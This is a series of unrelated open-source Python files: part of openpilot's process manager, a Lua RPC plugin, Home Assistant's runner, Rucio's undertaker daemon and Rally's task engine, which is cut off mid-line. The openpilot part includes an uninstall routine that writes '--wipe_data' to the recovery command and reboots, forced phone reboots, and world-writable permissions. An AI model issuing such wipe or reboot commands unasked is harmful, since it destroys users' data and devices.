failed after retry") sys.exit(1) else: # Build failed log errors errors = [line.decode('utf8', 'replace') for line in compile_output if any([err in line for err in [b'error: ', b'not found, needed by target']])] error_s = "\n".join(errors) add_logentries_handler(cloudlog) cloudlog.error("scons build failed\n" + error_s) # Show TextWindow error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors]) with TextWindow("openpilot failed to build\n \n" + error_s) as t: t.wait_for_exit() exit(1) else: break import cereal import cereal.messaging as messaging from common.params import Params import selfdrive.crash as crash from selfdrive.registration import register from selfdrive.version import version, dirty from selfdrive.loggerd.config import ROOT from selfdrive.launcher import launcher from common.apk import update_apks, pm_apply_packages, start_offroad ThermalStatus = cereal.log.ThermalData.ThermalStatus # comment out anything you don't want to run managed_processes = { "thermald": "selfdrive.thermald.thermald", "uploader": "selfdrive.loggerd.uploader", "deleter": "selfdrive.loggerd.deleter", "controlsd": "selfdrive.controls.controlsd", "plannerd": "selfdrive.controls.plannerd", "radard": "selfdrive.controls.radard", "dmonitoringd": "selfdrive.monitoring.dmonitoringd", "ubloxd": ("selfdrive/locationd", ["./ubloxd"]), "loggerd": ("selfdrive/loggerd", ["./loggerd"]), "logmessaged": "selfdrive.logmessaged", "locationd": "selfdrive.locationd.locationd", "tombstoned": "selfdrive.tombstoned", "logcatd": ("selfdrive/logcatd", ["./logcatd"]), "proclogd": ("selfdrive/proclogd", ["./proclogd"]), "boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly "pandad": "selfdrive.pandad", "ui": ("selfdrive/ui", ["./ui"]), "calibrationd": "selfdrive.locationd.calibrationd", "paramsd": "selfdrive.locationd.paramsd", "camerad": ("selfdrive/camerad", ["./camerad"]), "sensord": ("selfdrive/sensord", ["./sensord"]), "clocksd": ("selfdrive/clocksd", ["./clocksd"]), "gpsd": ("selfdrive/sensord", ["./gpsd"]), "updated": "selfdrive.updated", "dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]), "modeld": ("selfdrive/modeld", ["./modeld"]), "rtshield": "selfdrive.rtshield", } daemon_processes = { "manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"), } running: Dict[str, Process] = {} def get_running(): return running # due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption unkillable_processes = ['camerad'] # processes to end with SIGINT instead of SIGTERM interrupt_processes: List[str] = [] # processes to end with SIGKILL instead of SIGTERM kill_processes = ['sensord'] persistent_processes = [ 'thermald', 'logmessaged', 'ui', 'uploader', 'deleter', ] if not PC: persistent_processes += [ 'updated', 'logcatd', 'tombstoned', 'sensord', ] car_started_processes = [ 'controlsd', 'plannerd', 'loggerd', 'radard', 'calibrationd', 'paramsd', 'camerad', 'proclogd', 'locationd', 'clocksd', ] driver_view_processes = [ 'camerad', 'dmonitoringd', 'dmonitoringmodeld' ] if WEBCAM: car_started_processes += [ 'dmonitoringd', 'dmonitoringmodeld', ] if not PC: car_started_processes += [ 'ubloxd', 'dmonitoringd', 'dmonitoringmodeld', ] if ANDROID: car_started_processes += [ 'gpsd', 'rtshield', ] # starting dmonitoringmodeld when modeld is initializing can sometimes \ # result in a weird snpe state where dmon constantly uses more cpu than normal. car_started_processes += ['modeld'] def register_managed_process(name, desc, car_started=False): global managed_processes, car_started_processes, persistent_processes print("registering %s" % name) managed_processes[name] = desc if car_started: car_started_processes.append(name) else: persistent_processes.append(name) # ****************** process management functions ****************** def nativelauncher(pargs, cwd): # exec the process os.chdir(cwd) # because when extracted from pex zips permissions get lost -_- os.chmod(pargs[0], 0o700) os.execvp(pargs[0], pargs) def start_managed_process(name): if name in running or name not in managed_processes: return proc = managed_processes[name] if isinstance(proc, str): cloudlog.info("starting python %s" % proc) running[name] = Process(name=name, target=launcher, args=(proc,)) else: pdir, pargs = proc cwd = os.path.join(BASEDIR, pdir) cloudlog.info("starting process %s" % name) running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd)) running[name].start() def start_daemon_process(name): params = Params() proc, pid_param = daemon_processes[name] pid = params.get(pid_param, encoding='utf-8') if pid is not None: try: os.kill(int(pid), 0) with open(f'/proc/{pid}/cmdline') as f: if proc in f.read(): # daemon is running return except (OSError, FileNotFoundError): # process is dead pass cloudlog.info("starting daemon %s" % name) proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setpgrp) params.put(pid_param, str(proc.pid)) def prepare_managed_process(p): proc = managed_processes[p] if isinstance(proc, str): # import this python cloudlog.info("preimporting %s" % proc) importlib.import_module(proc) elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")): # build this process cloudlog.info("building %s" % (proc,)) try: subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) except subprocess.CalledProcessError: # make clean if the build failed cloudlog.warning("building %s failed, make clean" % (proc, )) subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0])) subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) def join_process(process, timeout): # Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382 # We have to poll the exitcode instead t = time.time() while time.time() - t < timeout and process.exitcode is None: time.sleep(0.001) def kill_managed_process(name): if name not in running or name not in managed_processes: return cloudlog.info("killing %s" % name) if running[name].exitcode is None: if name in interrupt_processes: os.kill(running[name].pid, signal.SIGINT) elif name in kill_processes: os.kill(running[name].pid, signal.SIGKILL) else: running[name].terminate() join_process(running[name], 5) if running[name].exitcode is None: if name in unkillable_processes: cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name) join_process(running[name], 15) if running[name].exitcode is None: cloudlog.critical("unkillable process %s failed to die!" % name) # TODO: Use method from HARDWARE if ANDROID: cloudlog.critical("FORCE REBOOTING PHONE!") os.system("date >> /sdcard/unkillable_reboot") os.system("reboot") raise RuntimeError else: cloudlog.info("killing %s with SIGKILL" % name) os.kill(running[name].pid, signal.SIGKILL) running[name].join() cloudlog.info("%s is dead with %d" % (name, running[name].exitcode)) del running[name] def cleanup_all_processes(signal, frame): cloudlog.info("caught ctrl-c %s %s" % (signal, frame)) if ANDROID: pm_apply_packages('disable') for name in list(running.keys()): kill_managed_process(name) cloudlog.info("everything is dead") def send_managed_process_signal(name, sig): if name not in running or name not in managed_processes or \ running[name].exitcode is not None: return cloudlog.info(f"sending signal {sig} to {name}") os.kill(running[name].pid, sig) # ****************** run loop ****************** def manager_init(should_register=True): if should_register: reg_res = register() if reg_res: dongle_id = reg_res else: raise Exception("server registration failed") else: dongle_id = "c"*16 # set dongle id cloudlog.info("dongle id is " + dongle_id) os.environ['DONGLE_ID'] = dongle_id cloudlog.info("dirty is %d" % dirty) if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True) crash.bind_user(id=dongle_id) crash.bind_extra(version=version, dirty=dirty, is_eon=True) os.umask(0) try: os.mkdir(ROOT, 0o777) except OSError: pass # ensure shared libraries are readable by apks if ANDROID: os.chmod(BASEDIR, 0o755) os.chmod(os.path.join(BASEDIR, "cereal"), 0o755) os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755) def manager_thread(): # now loop thermal_sock = messaging.sub_sock('thermal') cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() # start daemon processes for p in daemon_processes: start_daemon_process(p) # start persistent processes for p in persistent_processes: start_managed_process(p) # start offroad if ANDROID: pm_apply_packages('enable') start_offroad() if os.getenv("NOBOARD") is None: start_managed_process("pandad") if os.getenv("BLOCK") is not None: for k in os.getenv("BLOCK").split(","): del managed_processes[k] started_prev = False logger_dead = False while 1: msg = messaging.recv_sock(thermal_sock, wait=True) if msg.thermal.freeSpace < 0.05: logger_dead = True if msg.thermal.started: for p in car_started_processes: if p == "loggerd" and logger_dead: kill_managed_process(p) else: start_managed_process(p) else: logger_dead = False driver_view = params.get("IsDriverViewEnabled") == b"1" # TODO: refactor how manager manages processes for p in reversed(car_started_processes): if p not in driver_view_processes or not driver_view: kill_managed_process(p) for p in driver_view_processes: if driver_view: start_managed_process(p) else: kill_managed_process(p) # trigger an update after going offroad if started_prev: send_managed_process_signal("updated", signal.SIGHUP) started_prev = msg.thermal.started # check the status of all processes, did any of them die? running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running] cloudlog.debug(' '.join(running_list)) # Exit main loop when uninstall is needed if params.get("DoUninstall", encoding='utf8') == "1": break def manager_prepare(spinner=None): # build all processes os.chdir(os.path.dirname(os.path.abspath(__file__))) # Spinner has to start from 70 here total = 100.0 if prebuilt else 30.0 for i, p in enumerate(managed_processes): if spinner is not None: spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),)) prepare_managed_process(p) def uninstall(): cloudlog.warning("uninstalling") with open('/cache/recovery/command', 'w') as f: f.write('--wipe_data\n') # IPowerManager.reboot(confirm=false, reason="recovery", wait=true) HARDWARE.reboot(reason="recovery") def main(): if ANDROID: # the flippening! os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1') # disable bluetooth os.system('service call bluetooth_manager 8') params = Params() params.manager_start() default_params = [ ("CommunityFeaturesToggle", "0"), ("CompletedTrainingVersion", "0"), ("IsRHD", "0"), ("IsMetric", "0"), ("RecordFront", "0"), ("HasAcceptedTerms", "0"), ("HasCompletedSetup", "0"), ("IsUploadRawEnabled", "1"), ("IsLdwEnabled", "1"), ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')), ("OpenpilotEnabledToggle", "1"), ("LaneChangeEnabled", "1"), ("IsDriverViewEnabled", "0"), ] # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this chffrplus? if os.getenv("PASSIVE") is not None: params.put("Passive", str(int(os.getenv("PASSIVE")))) if params.get("Passive") is None: raise Exception("Passive must be set to continue") if ANDROID: update_apks() manager_init() manager_prepare(spinner) spinner.close() if os.getenv("PREPAREONLY") is not None: return # SystemExit on sigterm signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1)) try: manager_thread() except Exception: traceback.print_exc() crash.capture_exception() finally: cleanup_all_processes(None, None) if params.get("DoUninstall", encoding='utf8') == "1": uninstall() if __name__ == "__main__": try: main() except Exception: add_logentries_handler(cloudlog) cloudlog.exception("Manager failed to start") # Show last 3 lines of traceback error = traceback.format_exc(-3) error = "Manager failed to start\n \n" + error with TextWindow(error) as t: t.wait_for_exit() raise # manual exit because we are forked sys.exit(0)
main.py
#!/usr/bin/env python2 # Asynchronous RPC server over STDIO from __future__ import print_function import sys import time import pyjsonrpc import threading import Queue import signal import json import base64 # --- Lua help text --- # Help for the functions that are made available to Lua luahelp = """ add3(number, number) -> number // Adds two numbers and then the number 3 """ # --- Lua code --- # $0 is replaced with the path to the plugin, when sending this code to the server luacode = """ function add3(a, b) return CallPlugin("$0", "Add3", a, b) end """ # --- RPC classes and functions --- def log(*objs): """Warning log function that prints to stderr""" print("[plugin log]", *objs, file=sys.stderr) class EncDec: """Decorator for decoding and encoding the arguments and return values""" def __init__(self, f): self.f = f def __call__(self, *args, **kwargs): a = json.loads(base64.decodestring(args[0])) return base64.encodestring(json.dumps(self.f(self, *a))) class JsonRpc(pyjsonrpc.JsonRpc): """Only uppercase methods are made available under the Lua namespace""" # Remember to decorate with @EncDec if needed, to enc/dec to base64 and JSON @pyjsonrpc.rpcmethod @EncDec def Add3(self, a, b): """Add two numbers and then 3""" return a + b + 3 @pyjsonrpc.rpcmethod def Code(self, pluginPath): """Return the Lua code for this plugin, as JSON""" return luacode.replace("$0", pluginPath) @pyjsonrpc.rpcmethod def Help(self, args): """Return the Lua help for this plugin, as JSON""" return luahelp # --- Common functions --- queue = Queue.Queue() def worker(line, q, rpc_client): """Worker thread that handles the RPC server calls fror us when requests come in via stdin""" out = rpc_client.call(line) q.put(out) return def printer(q): """Output handler, printer thread will poll the results queue and output results as they appear.""" #log("Printer started") while True: out = q.get() if out == "kill": #log("Kill signal recieved, stopping threads") return sys.stdout.write(out + "\n") sys.stdout.flush() return printer_thread = threading.Thread(target=printer, args=[queue]) def init(): """Initialise the printer thread and exit signal handler so that we kill long running threads on exit""" printer_thread.start() def signal_handler(signal, frame): queue.put("kill") printer_thread.join() #sys.exit(0) signal.signal(signal.SIGINT, signal_handler) return def main(): init() rpc = JsonRpc() # Build the Lua RPC namespace for methods that starts with an uppercase letter for name in dir(rpc): if name[0].isupper(): setattr(rpc, "Lua." + name, getattr(rpc, name, None)) line = sys.stdin.readline() # The handling of lines is asynchronous, # so that out-of-order requests can be handled while line: try: this_input = line t = threading.Thread(target=worker, args=[line, queue, rpc]) t.start() line = sys.stdin.readline() except Exception as e: log("Exception occured: ", e) queue.put("kill") printer_thread.join() if __name__ == "__main__": main()
runner.py
"""Run Home Assistant.""" import asyncio from concurrent.futures import ThreadPoolExecutor import dataclasses import logging import sys import threading from typing import Any, Dict, Optional from homeassistant import bootstrap from homeassistant.core import callback from homeassistant.helpers.frame import warn_use # # Python 3.8 has significantly less workers by default # than Python 3.7. In order to be consistent between # supported versions, we need to set max_workers. # # In most cases the workers are not I/O bound, as they # are sleeping/blocking waiting for data from integrations # updating so this number should be higher than the default # use case. # MAX_EXECUTOR_WORKERS = 64 @dataclasses.dataclass class RuntimeConfig: """Class to hold the information for running Home Assistant.""" config_dir: str skip_pip: bool = False safe_mode: bool = False verbose: bool = False log_rotate_days: Optional[int] = None log_file: Optional[str] = None log_no_color: bool = False debug: bool = False open_ui: bool = False # In Python 3.8+ proactor policy is the default on Windows if sys.platform == "win32" and sys.version_info[:2] < (3, 8): PolicyBase = asyncio.WindowsProactorEventLoopPolicy else: PolicyBase = asyncio.DefaultEventLoopPolicy class HassEventLoopPolicy(PolicyBase): # type: ignore """Event loop policy for Home Assistant.""" def __init__(self, debug: bool) -> None: """Init the event loop policy.""" super().__init__() self.debug = debug @property def loop_name(self) -> str: """Return name of the loop.""" return self._loop_factory.__name__ # type: ignore def new_event_loop(self) -> asyncio.AbstractEventLoop: """Get the event loop.""" loop: asyncio.AbstractEventLoop = super().new_event_loop() loop.set_exception_handler(_async_loop_exception_handler) if self.debug: loop.set_debug(True) executor = ThreadPoolExecutor( thread_name_prefix="SyncWorker", max_workers=MAX_EXECUTOR_WORKERS ) loop.set_default_executor(executor) loop.set_default_executor = warn_use( # type: ignore loop.set_default_executor, "sets default executor on the event loop" ) # Python 3.9+ if hasattr(loop, "shutdown_default_executor"): return loop # Copied from Python 3.9 source def _do_shutdown(future: asyncio.Future) -> None: try: executor.shutdown(wait=True) loop.call_soon_threadsafe(future.set_result, None) except Exception as ex: # pylint: disable=broad-except loop.call_soon_threadsafe(future.set_exception, ex) async def shutdown_default_executor() -> None: """Schedule the shutdown of the default executor.""" future = loop.create_future() thread = threading.Thread(target=_do_shutdown, args=(future,)) thread.start() try: await future finally: thread.join() setattr(loop, "shutdown_default_executor", shutdown_default_executor) return loop @callback def _async_loop_exception_handler(_: Any, context: Dict) -> None: """Handle all exception inside the core loop.""" kwargs = {} exception = context.get("exception") if exception: kwargs["exc_info"] = (type(exception), exception, exception.__traceback__) logging.getLogger(__package__).error( "Error doing job: %s", context["message"], **kwargs # type: ignore ) async def setup_and_run_hass(runtime_config: RuntimeConfig) -> int: """Set up Home Assistant and run.""" hass = await bootstrap.async_setup_hass(runtime_config) if hass is None: return 1 return await hass.async_run() def run(runtime_config: RuntimeConfig) -> int: """Run Home Assistant.""" asyncio.set_event_loop_policy(HassEventLoopPolicy(runtime_config.debug)) return asyncio.run(setup_and_run_hass(runtime_config))
undertaker.py
# -*- coding: utf-8 -*- # Copyright 2013-2020 CERN # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # - Vincent Garonne <vgaronne@gmail.com>, 2013-2018 # - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2015 # - Martin Barisits <martin.barisits@cern.ch>, 2016-2019 # - Mario Lassnig <mario.lassnig@cern.ch>, 2018 # - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019 # - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019 # - Brandon White <bjwhite@fnal.gov>, 2019 # - Thomas Beermann <thomas.beermann@cern.ch>, 2020 # - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020 # - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020 ''' Undertaker is a daemon to manage expired did. ''' import logging import os import socket import sys import threading import time import traceback from copy import deepcopy from datetime import datetime, timedelta from random import randint from re import match from sqlalchemy.exc import DatabaseError import rucio.db.sqla.util from rucio.common.config import config_get from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound from rucio.common.types import InternalAccount from rucio.common.utils import chunks from rucio.core.did import list_expired_dids, delete_dids from rucio.core.heartbeat import live, die, sanity_check from rucio.core.monitor import record_counter logging.getLogger("requests").setLevel(logging.CRITICAL) logging.basicConfig(stream=sys.stdout, level=getattr(logging, config_get('common', 'loglevel', raise_exception=False, default='DEBUG').upper()), format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s') GRACEFUL_STOP = threading.Event() def undertaker(worker_number=1, total_workers=1, chunk_size=5, once=False): """ Main loop to select and delete dids. """ logging.info('Undertaker(%s): starting', worker_number) logging.info('Undertaker(%s): started', worker_number) executable = 'undertaker' hostname = socket.gethostname() pid = os.getpid() thread = threading.current_thread() sanity_check(executable=executable, hostname=hostname) paused_dids = {} # {(scope, name): datetime} while not GRACEFUL_STOP.is_set(): try: heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread, older_than=6000) logging.info('Undertaker({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'.format(locals())) # Refresh paused dids iter_paused_dids = deepcopy(paused_dids) for key in iter_paused_dids: if datetime.utcnow() > paused_dids[key]: del paused_dids[key] dids = list_expired_dids(worker_number=heartbeat['assign_thread'], total_workers=heartbeat['nr_threads'], limit=10000) dids = [did for did in dids if (did['scope'], did['name']) not in paused_dids] if not dids and not once: logging.info('Undertaker(%s): Nothing to do. sleep 60.', worker_number) time.sleep(60) continue for chunk in chunks(dids, chunk_size): try: logging.info('Undertaker(%s): Receive %s dids to delete', worker_number, len(chunk)) delete_dids(dids=chunk, account=InternalAccount('root', vo='def'), expire_rules=True) logging.info('Undertaker(%s): Delete %s dids', worker_number, len(chunk)) record_counter(counters='undertaker.delete_dids', delta=len(chunk)) except RuleNotFound as error: logging.error(error) except (DatabaseException, DatabaseError, UnsupportedOperation) as e: if match('.*ORA-00054.*', str(e.args[0])) or match('.*55P03.*', str(e.args[0])) or match('.*3572.*', str(e.args[0])): for did in chunk: paused_dids[(did['scope'], did['name'])] = datetime.utcnow() + timedelta(seconds=randint(600, 2400)) record_counter('undertaker.delete_dids.exceptions.LocksDetected') logging.warning('undertaker[%s/%s]: Locks detected for chunk', heartbeat['assign_thread'], heartbeat['nr_threads']) else: logging.error('Undertaker(%s): Got database error %s.', worker_number, str(e)) except: logging.critical(traceback.format_exc()) time.sleep(1) if once: break die(executable=executable, hostname=hostname, pid=pid, thread=thread) logging.info('Undertaker(%s): graceful stop requested', worker_number) logging.info('Undertaker(%s): graceful stop done', worker_number) def stop(signum=None, frame=None): """ Graceful exit. """ GRACEFUL_STOP.set() def run(once=False, total_workers=1, chunk_size=10): """ Starts up the undertaker threads. """ if rucio.db.sqla.util.is_old_db(): raise DatabaseException('Database was not updated, daemon won\'t start') logging.info('main: starting threads') threads = [threading.Thread(target=undertaker, kwargs={'worker_number': i, 'total_workers': total_workers, 'once': once, 'chunk_size': chunk_size}) for i in range(0, total_workers)] [t.start() for t in threads] logging.info('main: waiting for interrupts') # Interruptible joins require a timeout. while threads[0].is_alive(): [t.join(timeout=3.14) for t in threads]
engine.py
# Copyright 2013: Mirantis Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import json import threading import time import traceback from rally.common import cfg from rally.common import logging from rally.common import objects from rally import consts from rally import exceptions from rally.task import context from rally.task import hook from rally.task import runner from rally.task import scenario from rally.task import sla from rally.utils import strutils LOG = logging.getLogger(__name__) CONF = cfg.CONF TASK_ENGINE_OPTS = [ cfg.IntOpt("raw_result_chunk_size", default=1000, min=1, help="Size of raw result chunk in iterations"), ] class ResultConsumer(object): """ResultConsumer class stores results from ScenarioRunner, checks SLA. Also ResultConsumer listens for runner events and notifies HookExecutor about started iterations. """ def __init__(self, workload_cfg, task, subtask, workload, runner, abort_on_sla_failure, ctx_manager): """ResultConsumer constructor. :param workload_cfg: A configuration of the Workload :param task: Instance of Task, task to run :param subtask: Instance of Subtask :param workload: Instance of Workload :param runner: ScenarioRunner instance that produces results to be consumed :param abort_on_sla_failure: True if the execution should be stopped when some SLA check fails :param ctx_manager: ContextManager instance """ self.task = task self.subtask = subtask self.workload = workload self.workload_cfg = workload_cfg self.runner = runner self.load_started_at = float("inf") self.load_finished_at = 0 self.workload_data_count = 0 self.sla_checker = sla.SLAChecker(self.workload_cfg) self.hook_executor = hook.HookExecutor(self.workload_cfg, self.task) self.abort_on_sla_failure = abort_on_sla_failure self.is_done = threading.Event() self.unexpected_failure = {} self.results = [] self.thread = threading.Thread(target=self._consume_results) self.aborting_checker = threading.Thread(target=self.wait_and_abort) if self.workload_cfg["hooks"]: self.event_thread = threading.Thread(target=self._consume_events) self._cm = ctx_manager def __enter__(self): self.thread.start() self.aborting_checker.start() if self.workload_cfg["hooks"]: self.event_thread.start() self.start = time.time() return self def _consume_results(self): task_aborted = False while True: if self.runner.result_queue: results = self.runner.result_queue.popleft() self.results.extend(results) for r in results: self.load_started_at = min(r["timestamp"], self.load_started_at) self.load_finished_at = max(r["duration"] + r["timestamp"], self.load_finished_at) success = self.sla_checker.add_iteration(r) if (self.abort_on_sla_failure and not success and not task_aborted): self.sla_checker.set_aborted_on_sla() self.runner.abort() self.task.update_status( consts.TaskStatus.SOFT_ABORTING) task_aborted = True # save results chunks chunk_size = CONF.raw_result_chunk_size while len(self.results) >= chunk_size: results_chunk = self.results[:chunk_size] self.results = self.results[chunk_size:] results_chunk.sort(key=lambda x: x["timestamp"]) self.workload.add_workload_data(self.workload_data_count, {"raw": results_chunk}) self.workload_data_count += 1 elif self.is_done.isSet(): break else: time.sleep(0.1) def _consume_events(self): while not self.is_done.isSet() or self.runner.event_queue: if self.runner.event_queue: event = self.runner.event_queue.popleft() self.hook_executor.on_event( event_type=event["type"], value=event["value"]) else: time.sleep(0.01) def __exit__(self, exc_type, exc_value, exc_traceback): self.finish = time.time() self.is_done.set() self.aborting_checker.join() self.thread.join() if exc_type: self.sla_checker.set_unexpected_failure(exc_value) if objects.Task.get_status( self.task["uuid"]) == consts.TaskStatus.ABORTED: self.sla_checker.set_aborted_manually() load_duration = max(self.load_finished_at - self.load_started_at, 0) LOG.info("Load duration is: %s" % strutils.format_float_to_str( load_duration)) LOG.info("Full runner duration is: %s" % strutils.format_float_to_str(self.runner.run_duration)) LOG.info("Full duration is: %s" % strutils.format_float_to_str( self.finish - self.start)) results = {} if self.workload_cfg["hooks"]: self.event_thread.join() results["hooks_results"] = self.hook_executor.results() if self.results: # NOTE(boris-42): Sort in order of starting # instead of order of ending self.results.sort(key=lambda x: x["timestamp"]) self.workload.add_workload_data(self.workload_data_count, {"raw": self.results}) start_time = (self.load_started_at if self.load_started_at != float("inf") else None) self.workload.set_results(load_duration=load_duration, full_duration=(self.finish - self.start), sla_results=self.sla_checker.results(), start_time=start_time, contexts_results=self._cm.contexts_results(), **results) @staticmethod def is_task_in_aborting_status(task_uuid, check_soft=True): """Checks task is in abort stages :param task_uuid: UUID of task to check status :type task_uuid: str :param check_soft: check or not SOFT_ABORTING status :type check_soft: bool """ stages = [consts.TaskStatus.ABORTING, consts.TaskStatus.ABORTED] if check_soft: stages.append(consts.TaskStatus.SOFT_ABORTING) return objects.Task.get_status(task_uuid) in stages def wait_and_abort(self): """Waits until abort signal is received and aborts runner in this case. Has to be run from different thread simultaneously with the runner.run method. """ while not self.is_done.isSet(): if self.is_task_in_aborting_status(self.task["uuid"], check_soft=False): self.runner.abort() self.task.update_status(consts.TaskStatus.ABORTED) break time.sleep(2.0) class TaskAborted(Exception): """Task aborted exception Used by TaskEngine to interrupt task run. """ class TaskEngine(object): """The Task engine class is used to execute benchmark scenarios. An instance of this class is initialized by the API with the task configuration and then is used to validate and execute all specified in config subtasks. .. note:: Typical usage: ... engine = TaskEngine(config, task, env) engine.validate() # to test config engine.run() # to run config """ def __init__(self, config, task, env, abort_on_sla_failure=False): """TaskEngine constructor. :param config: An instance of a rally.task.config.TaskConfig :param task: Instance of Task, the current task which is being performed :param env: Instance of Environment, :param abort_on_sla_failure: True if the execution should be stopped when some SLA check fails """ self.config = config self.task = task self.env = env self.abort_on_sla_failure = abort_on_sla_failure def _validate_workload(self, workload, vcontext=None, vtype=None): """Validate a workload. :param workload: a workload configuration :param vcontext: a validation context :param vtype: a type of validation (platform, syntax or semantic) """ try: scenario_cls = scenario.Scenario.get(workload["name"]) except exceptions.PluginNotFound as e: raise exceptions.InvalidTaskConfig( name=workload["name"], pos=workload["position"], config=json.dumps(objects.Workload.to_task(workload)), reason=e.format_message()) scenario_context = copy.deepcopy(scenario_cls.get_default_context()) results = [] results.extend(scenario.Scenario.validate( name=workload["name"], context=vcontext, config=workload, plugin_cfg=None, vtype=vtype)) if workload["runner_type"]: results.extend(runner.ScenarioRunner.validate( name=workload["runner_type"], context=vcontext, config=None, plugin_cfg=workload["runner"], vtype=vtype)) for context_name, context_conf in workload["contexts"].items(): results.extend(context.Context.validate( name=context_name, context=vcontext, config=None, plugin_cfg=context_conf, vtype=vtype)) for context_name, context_conf in scenario_context.items(): results.extend(context.Context.validate( name=context_name, context=vcontext, config=None, plugin_cfg=context_conf, allow_hidden=True, vtype=vtype)) for sla_name, sla_conf in workload["sla"].items(): results.extend(sla.SLA.validate( name=sla_name, context=vcontext, config=None, plugin_cfg=sla_conf, vtype=vtype)) for hook_conf in workload["hooks"]: action_name, action_cfg = hook_conf["action"] results.extend(hook.HookAction.validate( name=action_name, context=vcontext, config=None, plugin_cfg=action_cfg, vtype=vtype)) trigger_name, trigger_cfg = hook_conf["trigger"] results.extend(hook.HookTrigger.validate( name=trigger_name, context=vcontext, config=None, plugin_cfg=trigger_cfg, vtype=vtype)) if results: raise exceptions.InvalidTaskConfig( name=workload["name"], pos=workload["position"], config=json.dumps(objects.Workload.to_task(workload)), reason="\n ".join(results)) @logging.log_task_wrapper(LOG.info, "Task validation of syntax.") def _validate_config_syntax(self, config): for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload(workload, vtype="syntax") @logging.log_task_wrapper(LOG.info, "Task validation of required platforms.") def _validate_config_platforms(self, config): # FIXME(andreykurilin): prepare the similar context object to others platforms = dict( (p["platform_name"], p["platform_data"]) for p in self.env.data["platforms"].values()) ctx = {"task": self.task, "platforms": platforms} for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload( workload, vcontext=ctx, vtype="platform") @logging.log_task_wrapper(LOG.info, "Task validation of semantic.") def _validate_config_semantic(self, config): LOG.info("Check health of the environment '%s'." % self.env.uuid) failed = [] for p, res in self.env.check_health().items(): LOG.info("Platform %s (available: %s): %s" % (p, res["available"], res["message"])) if not res["available"]: failed.append(p) if logging.is_debug(): LOG.error(res["traceback"]) if failed: raise exceptions.ValidationError( "One or several platforms are not available: %s. Check logs " "for more details." % ", ".join(failed)) validation_ctx = self.env.get_validation_context() env_data = self.env.data env_data["platforms"] = dict( (p["platform_name"], p["platform_data"]) for p in env_data["platforms"].values()) ctx_obj = {"task": self.task, "config": validation_ctx, "env": env_data} with context.ContextManager(ctx_obj): for subtask in config.subtasks: for workload in subtask["workloads"]: self._validate_workload( workload, vcontext=ctx_obj, vtype="semantic") @logging.log_task_wrapper(LOG.info, "Task validation.") def validate(self, only_syntax=False): """Perform full task configuration validation. :param only_syntax: Check only syntax of task configuration """ self.task.update_status(consts.TaskStatus.VALIDATING) try: self._validate_config_syntax(self.config) if only_syntax: return self._validate_config_platforms(self.config) self._validate_config_semantic(self.config) except Exception as e: exception_info = json.dumps(traceback.format_exc(), indent=2, separators=(",", ": ")) self.task.set_failed(type(e).__name__, str(e), exception_info) expected_errors = ( # this error is a wrapper for all error messages from # validators. exceptions.InvalidTaskConfig, # rally.task.task_cfg raises it # _validate_config_semantic raises this error in case of # failed platform check{s} exceptions.ValidationError) if logging.is_debug() and not isinstance(e, expected_errors): LOG.exception("Unexpected error had happened while validating " "task.") raise def _prepare_context(self, ctx, scenario_name, owner_id): context_config = {} # restore full names of plugins scenario_plugin = scenario.Scenario.get(scenario_name) for k, v in scenario_plugin.get_default_context().items(): c = context.Context.get(k, allow_hidden=True) context_config[c.get_fullname()] = v for k, v in ctx.items(): context_config[context.Context.get(k).get_fullname()] = v env_data = self.env.data env_data["platforms"] = dict( 